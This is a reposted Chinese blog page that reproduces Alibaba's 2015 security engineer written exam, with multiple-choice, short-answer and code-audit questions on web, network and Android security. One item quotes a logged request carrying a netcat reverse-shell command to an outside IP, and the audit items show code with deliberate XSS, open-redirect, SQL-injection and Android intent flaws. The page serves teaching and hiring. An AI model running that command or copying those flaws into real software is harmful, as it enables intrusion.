阿里2015安全工程师笔试题

原文地址:http://bhhacker.lofter.com/post/38b021_68dce48

不定项选择(多选、少选、错选不得分)

2014年阿里巴巴奖励白帽子数是多少人?
• 100-200
• 200-300
• 300-400
• 400-500

管理员A君需要限制行政部B君上网需要在哪里配置策略
• 办公网大楼核心交换机上设置安全策略
• 办公网大楼出口防火墙上设置安全策略
• 办公网大楼出口IPS上设置安全策略
• 办公网大楼出口路由器设置安全策略

对URL中的参数进行签名的目的是保障数据的()
• 可用性
• 保密性
• 完整性

在电影《社交网络》中,主角获取到了全校所有女生的证件照,可能是实施了以下哪种类型的攻击
• XSS
• CSRF
• 越权
• 以上选项都不可以

黑客在只能提交文字的博客上,通过发帖传播javascript编写的蠕虫。这个博客很可能存在那种漏洞
• URL跳转漏洞
• CSRF
• XSS
• 其他选项都不对

小A想限制10.243.42.123对自己服务器10.243.43.122的web应用的,以下哪些措施是无效的
• 设置iptables
• 接入交换机设备上设置ACL
• 设置公网出口防火墙
• 设置Apache限制

网站开发框架(SSH)中,未曾出现过远程代码执行漏洞的是
• 第一个S
• 第二个S
• H
• 以上都不对

在能够获取root权限的Android4.3原生系统上,如何打开系统的core dump功能:
• 无需操作,默认打开
• 使用命令ulimit –C unlimited打开
• 修改/etc/initrd中的ulimit相关选项打开
• 修改/etc/initrd中的ulimit相关选项并重启系统
• 以上都不对

以下对于Masterkey漏洞及其变种的描述,错误的是:
• 这个漏洞源自于ZIP文件格式的缺陷
• 这个漏洞可以用于对HTTPS进行中间人攻击
• 这个漏洞可以用于伪造Android系统级应用程序的更新
• 这个漏洞位于Android上证书文件解析的过程中

ARM(32位)的inline hook, 想要实现任意位置的跳转,至少要修改被HOOK函数的函数头多少个字节?
• 1字节
• 2字节
• 3字节
• 4字节
• 8字节
• 12字节
• 16字节
• 32字节

简答题:

  • 请列举防御CC攻击的方法审计这条web请求,说说你的看法http://www.hack.cn/hack.php?cmd=nc%2058.96.180.251%208080%20-e%20/bin/bash 200

  • 你发现110.2.3.4正在暴力破解你所管理的服务器,你应该如何处理?

  • 硬件断点和软件点有什么不同?

  • 从网络流量上监测到一台Linux机器连接着一台木马控制端,在这台机器上仅使用系统自带的命令,如何定位出哪个是进程连接的?

  • 如果你设计一个账号系统,为保障密码的安全,你会如何设计存储密码?

  • 非对称的加密算法可以用来加密,也可以用于签名,请说明什么场景下用来加密,什么情景下用来签名?

  • ContentProvider是Android上负责提供数据读写的组件,应用内部或者应用之间的数据共享与存储都会使用 ContentProvider组件。 但在实际使用过程中,很容易出现各种安全问题,请结合你实践,描述一下在使用ContentProvider时,所需要注意的事项。

  • 现有一套针对某个jpg文件库的fuzz环境,每秒钟可以执行上千次fuzz实例,产生的crash很多,每次crash都有对应的crash dump,请说如初步何筛选出有价值的crash,如何确定某个特定的crash对应的fuzz实例,以及如何确定一个crash是否是安全漏洞(假设我 们只关心缓冲区溢出漏洞)。

  • gcc编译器支持的attribute ((constructor))特性得以实现的底层机制跟ELF结构的哪个部分有关系?这个部分在现实中哪些地方可以用到?

代码审计:

  • 淘宝首页以下代码片段是否可能存在安全漏洞?如果有,请指出来并提供修复建议;如果没有,说明你判断的理由
#set($url = $!request.getParameter('url'))
<script type="text/javascript">     
    window.location = $url;
</script>
  • 以下程序是否存在安全漏洞?如果有,请指出来并提供修复建议
<tr>   
    <td class="font_content" align="right">交易状态:</td>  
    <td class="font_content" align="left"><?php echo $_GET['trade_status'];?></td>
</tr>
  • 以下程序是否存在安全漏洞?如果有,请指出来并提供修复建议。
<?php    
    $id=$_GET['id'];    
    $getacct = mysql_query("select * from orders where id='$id' and client id='$fnm->clientid") or dir(mysql_error());    
    while ($row = mysql_fetch_array($getacct))    {    
        acctid = $row["id"];
?>    
<tr><td>Cpanel User:</td><td><?=$acctid;?></td></tr>
<?php    
}
?>
  • 在Linux系统中,我们通常使用终端shell脚本处理一些数据,十分高效便捷。现在有以下两个文件:
    File1:
user passwd
Hoecker animal
Newbee 238H76N3
Buttes Paradis1
TRON995 fdcmdgeo
G60FgL LgEl9H
ozron44 oriole62

File2:

id user
001 Yosh405
002 Newbee
003 G60FgL
004 Hoecker
005 sudhakar0303

要求:编写一段shell脚本,输出同时存在于File1和File2中用户名的密码。(可使用管道命令,只输出密码)

  • 以下是一段导出Activity的onCreate和onNewIntent函数中的代码,请找出其中的所有漏洞并说明可能产生的危害:其中:alibaba.test.sender是同样由淘宝开发的另一个应用程序的package name。此Activity对应的manifest文件中的定义:
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);        
    String calling_package= getCallingPackage();        
    if (!calling_package.equals("alibaba.test.sender")) {            
        return;        
    }  
}
protected void onNewIntent (Intent intent) {
    super.onNewIntent(intent);        
    Intent intent = getIntent();        
    Intent rec_intent;       
    rec_intent=intent.getParcelableExtra("log_intent");        
    Date date = new Date();      
    rec_intent.putExtra("timestamp",date.getTime());    
    rec_intent.putExtra("EVENT_TYPE","activity_launched");        
    rec_intent.setAction("LOG_ACTION");
   sendBroadcast(rec_intent, "TAOBAO_BROADCAST_RECEIVER");           
}
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,294评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,493评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,790评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,595评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,718评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,906评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,053评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,797评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,250评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,570评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,711评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,388评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,018评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,796评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,023评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,461评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,595评论 2 350

推荐阅读更多精彩内容

  • Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
    passiontim阅读 171,825评论 25 707
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,633评论 18 139
  • ¥开启¥ 【iAPP实现进入界面执行逐一显】 〖2017-08-25 15:22:14〗 《//首先开一个线程,因...
    小菜c阅读 6,373评论 0 17
  • 好种子: 1今天从姐姐家出来,姐姐给了我一个大红包,哇塞,收到惊喜,看到里面的钱更惊喜!好开心呀,钱包里一下又有人...
    西红柿的小姑娘阅读 221评论 0 0
  • 书没读多少,却越发的读出了很多不同的味道。我的思想里常常充斥着病态的想法,我一直希望自己即使是饥寒交迫的时候,也要...
    逆风仰望阅读 240评论 3 6